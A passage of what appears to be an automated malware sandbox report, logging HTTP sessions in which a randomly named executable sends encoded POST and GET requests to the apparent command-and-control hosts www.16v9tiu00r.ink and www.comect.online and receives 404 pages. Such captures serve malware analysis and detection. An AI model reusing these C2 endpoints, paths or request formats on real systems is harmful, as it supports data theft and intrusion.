                                                                                                                                          Data Raw: 71 30 43 3d 55 4c 73 53 31 6f 71 39 52 56 6b 6c 54 64 41 68 34 2f 71 6e 54 53 74 45 68 4f 57 69 71 71 39 36 4c 6c 68 58 4a 74 6d 72 79 6f 6f 36 6f 77 6d 74 2f 2b 79 4b 4f 51 64 63 61 43 79 33 56 41 57 61 34 66 33 4f 49 65 44 49 49 2b 63 6a 34 78 36 30 4b 31 35 43 74 31 37 70 34 44 58 34 66 75 42 42 76 49 6a 4c 51 49 6a 37 43 77 49 63 69 63 77 54 66 50 75 73 37 62 5a 75 72 4e 69 49 59 67 7a 73 70 53 7a 52 53 73 39 58 57 2f 48 35 62 56 48 2b 69 77 4a 39 67 71 61 59 44 57 59 68 32 65 49 51 58 63 43 41 72 31 38 2f 4f 4c 72 35 69 44 61 48 71 44 56 48 58 37 45 70 75 56 55 49 53 53 67 49 4b 6d 6e 75 38 4c 4c 4a 64 57 74 55 63 34 67 42 41 72 41 42 76 54 59 3d
                                                                                                                                          Data Ascii: q0C=ULsS1oq9RVklTdAh4/qnTStEhOWiqq96LlhXJtmryoo6owmt/+yKOQdcaCy3VAWa4f3OIeDII+cj4x60K15Ct17p4DX4fuBBvIjLQIj7CwIcicwTfPus7bZurNiIYgzspSzRSs9XW/H5bVH+iwJ9gqaYDWYh2eIQXcCAr18/OLr5iDaHqDVHX7EpuVUISSgIKmnu8LLJdWtUc4gBArABvTY=
                                                                                                                                          Dec 9, 2024 08:50:28.852627993 CET218INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
                                                                                                                                          Dec 9, 2024 08:50:28.852652073 CET1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 44 44
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-sc
                                                                                                                                          Dec 9, 2024 08:50:28.852920055 CET1236INData Raw: 20 20 20 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                                                                                                          Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } bl
                                                                                                                                          Dec 9, 2024 08:50:28.852931976 CET1236INData Raw: 3a 20 32 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 35 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6d 67 2d 6c 69 6e 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 7d 0a 20 20 20 20 20
                                                                                                                                          Data Ascii: : 22px;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (
                                                                                                                                          Dec 9, 2024 08:50:28.852942944 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 74 70 69 73 5f 63 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
                                                                                                                                          Dec 9, 2024 08:50:28.853535891 CET896INData Raw: 63 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 35 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e
                                                                                                                                          Data Ascii: cn{margin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-c
                                                                                                                                          Dec 9, 2024 08:50:28.853548050 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: </div> </div> </div> <script type="text/javascript"> var ie = window.ActiveXObject ? true : false; var ie8 = (ie && document.documentMode <= 8) ? true : fa
                                                                                                                                          Dec 9, 2024 08:50:28.853558064 CET855INData Raw: 61 73 73 4e 61 6d 65 20 3d 20 22 77 39 39 32 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 57 69 64 74 68 20 3e 20 37 36 38 20 26 26 20 77 69 6e 64 57 69 64 74 68 20 3c 3d 20 39 39 31 29 20
                                                                                                                                          Data Ascii: assName = "w992"; } else if (windWidth > 768 && windWidth <= 991) { document.body.className = "w769"; } else if (windWidth > 520 && windWidth <= 768) { document.body.class


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.449984149.104.34.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:30.058120012 CET10860OUTPOST /ah82/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Origin: http://www.16v9tiu00r.ink
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.16v9tiu00r.ink/ah82/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 55 4c 73 53 31 6f 71 39 52 56 6b 6c 54 64 41 68 34 2f 71 6e 54 53 74 45 68 4f 57 69 71 71 39 36 4c 6c 68 58 4a 74 6d 72 79 6f 51 36 6f 47 61 74 35 64 4b 4b 50 51 64 63 46 79 79 30 56 41 58 4b 34 66 2f 53 49 66 2f 69 49 38 6b 6a 70 6a 79 30 4d 45 35 43 6a 31 37 70 78 6a 58 35 41 2b 41 46 76 49 7a 50 51 49 7a 37 43 77 49 63 69 63 63 54 57 2b 75 73 33 37 5a 68 39 39 69 4d 63 67 7a 55 70 52 44 42 53 73 4a 48 57 76 6e 35 61 31 58 2b 68 43 68 39 38 36 62 2b 43 57 59 35 32 65 46 51 58 64 75 45 72 78 30 46 4f 49 33 35 7a 55 2f 4d 76 52 56 45 4e 71 39 32 73 48 49 43 62 52 41 49 4e 6e 2f 6b 74 65 76 7a 64 46 5a 32 57 6f 6c 30 5a 34 42 47 7a 33 37 37 48 4e 59 61 75 51 70 50 4c 61 6e 63 4f 58 42 63 49 55 68 30 49 33 5a 31 2b 6d 50 59 6f 69 59 76 50 47 55 39 78 6b 55 34 74 63 35 71 30 44 45 36 48 32 6d 68 50 76 55 43 31 42 59 46 37 64 30 33 62 46 71 35 38 65 43 61 75 41 4d 42 75 63 4a 56 6e 6a 35 4b 55 43 7a 54 64 30 46 6c 4c 67 6b 4b 65 4b 44 32 48 75 64 55 31 38 69 6c 46 4b 63 38 64 58 41 50 6b 35 [TRUNCATED]
                                                                                                                                          Data Ascii: q0C=ULsS1oq9RVklTdAh4/qnTStEhOWiqq96LlhXJtmryoQ6oGat5dKKPQdcFyy0VAXK4f/SIf/iI8kjpjy0ME5Cj17pxjX5A+AFvIzPQIz7CwIciccTW+us37Zh99iMcgzUpRDBSsJHWvn5a1X+hCh986b+CWY52eFQXduErx0FOI35zU/MvRVENq92sHICbRAINn/ktevzdFZ2Wol0Z4BGz377HNYauQpPLancOXBcIUh0I3Z1+mPYoiYvPGU9xkU4tc5q0DE6H2mhPvUC1BYF7d03bFq58eCauAMBucJVnj5KUCzTd0FlLgkKeKD2HudU18ilFKc8dXAPk5CU7MxcFUh0JboCZGoH/dvyKWa93tEt0TSawK2HKSBwA45fvNJ84BfCswLYCWihKUrq3Uvb+/sVYbhGYHRAywGpFcgvTIkmKaLHdVidzKNDpQiielYU/W/RlWBl4jNfhX5Ri3wrQG1R5MYgh+I4oRT1kxLmR4PrCTXRyJCh1tLXYzVAm6OaiCudglsZ7MiX/i4GZunRnyNptlVRyDyrvwlSpweCiZahexJCi/BWJuUlTPvbAC71yMC+H2E1wEawtFTBdyJfLp2xq98KbcGbh5o9RNjX99YXeZybo+zQaVghNjZOSvE+Rabj+DajyFG61EkDiEHJvpm28rQDBqng+9L/ydDBZNetf3+Q04SZ4OZRwvx31TxmCzzzYPbX9lzuj9D0ThUdz7kEED5OtD7pqb8dH0livXHMW9MbbU8nIVNClzhfyaJBXZkPUooAdpf9+UMyL1HEnKwZMGxhAcGkGn6nTit62zpJIe3XxQ2uvV5yMciwrwq1lVgcVIf4lYmVjpHIZx5aULd/l1pAV/coXhdcTQlb+kzCe/fkbOow9qKNfn9uJD0yeJNPnA+1nCCeW7OKBD1DT0J8bplpIrKStVveKbqsvjEnwnxJNWe5ZtBxsU0JAPx/8MyLowlRp0E4oTtcxeIUgZxna6kX0U2swrfKhOsNNR5nWlsj [TRUNCATED]
                                                                                                                                          Dec 9, 2024 08:50:31.549318075 CET218INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
                                                                                                                                          Dec 9, 2024 08:50:31.549503088 CET1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 44 44
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-sc
                                                                                                                                          Dec 9, 2024 08:50:31.549622059 CET1236INData Raw: 20 20 20 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                                                                                                          Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } bl
                                                                                                                                          Dec 9, 2024 08:50:31.549633980 CET1236INData Raw: 3a 20 32 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 35 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6d 67 2d 6c 69 6e 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 7d 0a 20 20 20 20 20
                                                                                                                                          Data Ascii: : 22px;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (
                                                                                                                                          Dec 9, 2024 08:50:31.550123930 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 74 70 69 73 5f 63 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
                                                                                                                                          Dec 9, 2024 08:50:31.550134897 CET1236INData Raw: 63 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 35 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e
                                                                                                                                          Data Ascii: cn{margin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-c
                                                                                                                                          Dec 9, 2024 08:50:31.550147057 CET1120INData Raw: 65 6d 6f 74 65 5f 61 64 64 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6c 6f 75 64 4e 6f 64 65 20 3d 20 24 73 65 72 76 65 72 5f 61 64 64 72 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 68 6f 77 43 6f 6e 74 65 6e 74
                                                                                                                                          Data Ascii: emote_addr; var cloudNode = $server_addr; var showContent = function () { document.getElementById("ip").textContent = ip; document.getElementById("cloud_node").textContent = cloudNode;


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.449990149.104.34.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:32.714024067 CET495OUTGET /ah82/?q0C=ZJEy2f+tUkBEF+w+scawLBB5zJTblKgdMgFXComG0qR9kHSC6PuhPC8uHAjvWDylpvj6Mcz0IvFDuxOLTDxJzlfpwwLacPhih5HaTILNLTJtkK4jcOiAtOE=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:34.231470108 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:33 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 44 44 4e 4e e7 b3 bb e7 bb 9f 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 43 68 72 6f 6d 65 3d 31 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 63 73 73 20 72 65 73 65 74 20 73 74 61 72 74 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 [TRUNCATED]
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> /*css reset start*/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; p [TRUNCATED]
                                                                                                                                          Dec 9, 2024 08:50:34.231532097 CET224INData Raw: 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66
                                                                                                                                          Data Ascii: : 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } article, aside, details, figcaption, figure, fo
                                                                                                                                          Dec 9, 2024 08:50:34.231642962 CET1236INData Raw: 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20
                                                                                                                                          Data Ascii: oter, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } blockquo
                                                                                                                                          Dec 9, 2024 08:50:34.231841087 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 35 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6d 67 2d 6c 69 6e 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                          Data Ascii: ;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (min-wi
                                                                                                                                          Dec 9, 2024 08:50:34.231853962 CET1236INData Raw: 20 20 20 20 20 20 20 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 74 70 69 73 5f 63 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 7d 0a 20 20 20
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
                                                                                                                                          Dec 9, 2024 08:50:34.232261896 CET1236INData Raw: 67 69 6e 2d 74 6f 70 3a 20 32 35 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23
                                                                                                                                          Data Ascii: gin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-cn{marg
                                                                                                                                          Dec 9, 2024 08:50:34.232314110 CET1236INData Raw: 61 64 64 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6c 6f 75 64 4e 6f 64 65 20 3d 20 24 73 65 72 76 65 72 5f 61 64 64 72 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 68 6f 77 43 6f 6e 74 65 6e 74 20 3d 20 66 75 6e
                                                                                                                                          Data Ascii: addr; var cloudNode = $server_addr; var showContent = function () { document.getElementById("ip").textContent = ip; document.getElementById("cloud_node").textContent = cloudNode;
                                                                                                                                          Dec 9, 2024 08:50:34.232326031 CET509INData Raw: 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 22 77 33 32 31 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d
                                                                                                                                          Data Ascii: cument.body.className = "w321"; } else { document.body.className = "lt-w320"; } }; window.onload = function () { showContent(); if (i


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.450007124.6.61.130804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:39.770941973 CET755OUTPOST /hmf8/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Origin: http://www.comect.online
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.comect.online/hmf8/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 6b 45 59 63 2f 74 4b 57 39 6e 43 57 6d 4d 45 5a 73 56 70 74 38 41 42 77 41 5a 64 75 6a 63 44 31 43 46 53 4e 50 72 2b 34 4b 4d 44 57 73 65 31 43 44 78 6a 79 77 54 2f 46 48 4d 65 68 74 31 66 66 55 48 59 4e 52 67 30 55 67 62 6d 79 64 78 4b 69 4f 47 67 37 38 4b 4f 6b 49 44 49 6e 67 64 6e 79 67 61 47 2b 6a 77 4d 77 78 77 4e 31 44 72 67 61 37 53 51 56 37 68 6b 71 47 4b 4c 72 46 34 37 45 79 73 79 34 66 50 76 69 2f 77 43 63 30 33 4f 72 79 4d 7a 49 72 4a 78 78 38 67 47 4a 33 35 42 7a 41 32 52 31 6d 49 63 46 56 62 31 62 33 7a 58 77 48 46 73 70 75 75 76 79 66 53 78 55 70 74 76 77 41 41 3d 3d
                                                                                                                                          Data Ascii: q0C=kEYc/tKW9nCWmMEZsVpt8ABwAZdujcD1CFSNPr+4KMDWse1CDxjywT/FHMeht1ffUHYNRg0UgbmydxKiOGg78KOkIDIngdnygaG+jwMwxwN1Drga7SQV7hkqGKLrF47Eysy4fPvi/wCc03OryMzIrJxx8gGJ35BzA2R1mIcFVb1b3zXwHFspuuvyfSxUptvwAA==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.450013124.6.61.130804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:42.484842062 CET775OUTPOST /hmf8/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Origin: http://www.comect.online
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.comect.online/hmf8/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 6b 45 59 63 2f 74 4b 57 39 6e 43 57 6c 75 51 5a 72 47 42 74 37 67 42 78 50 35 64 75 6f 38 44 78 43 46 65 4e 50 6f 79 52 4b 36 72 57 73 36 6c 43 41 77 6a 79 7a 54 2f 46 4e 73 65 6b 75 46 66 55 55 48 55 7a 52 67 34 55 67 61 43 79 64 7a 53 69 4f 31 34 34 38 61 4f 6d 57 6a 49 6c 75 39 6e 79 67 61 47 2b 6a 77 70 74 78 30 70 31 44 61 77 61 36 7a 51 57 32 42 6b 72 42 4b 4c 72 42 34 37 49 79 73 7a 76 66 4c 76 59 2f 32 4f 63 30 79 4b 72 79 35 48 58 6c 35 77 62 32 41 48 58 2f 4d 6f 52 50 47 63 46 68 49 63 6c 53 34 68 62 79 31 61 71 57 30 4e 2b 38 75 4c 42 43 56 34 67 6b 75 53 35 62 4c 73 74 79 67 36 55 42 4d 4d 33 42 50 46 36 5a 30 64 57 45 34 73 3d
                                                                                                                                          Data Ascii: q0C=kEYc/tKW9nCWluQZrGBt7gBxP5duo8DxCFeNPoyRK6rWs6lCAwjyzT/FNsekuFfUUHUzRg4UgaCydzSiO1448aOmWjIlu9nygaG+jwptx0p1Dawa6zQW2BkrBKLrB47IyszvfLvY/2Oc0yKry5HXl5wb2AHX/MoRPGcFhIclS4hby1aqW0N+8uLBCV4gkuS5bLstyg6UBMM3BPF6Z0dWE4s=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.450022124.6.61.130804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:45.140060902 CET10857OUTPOST /hmf8/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Origin: http://www.comect.online
                                                                                                                                          Content-Length: 10300
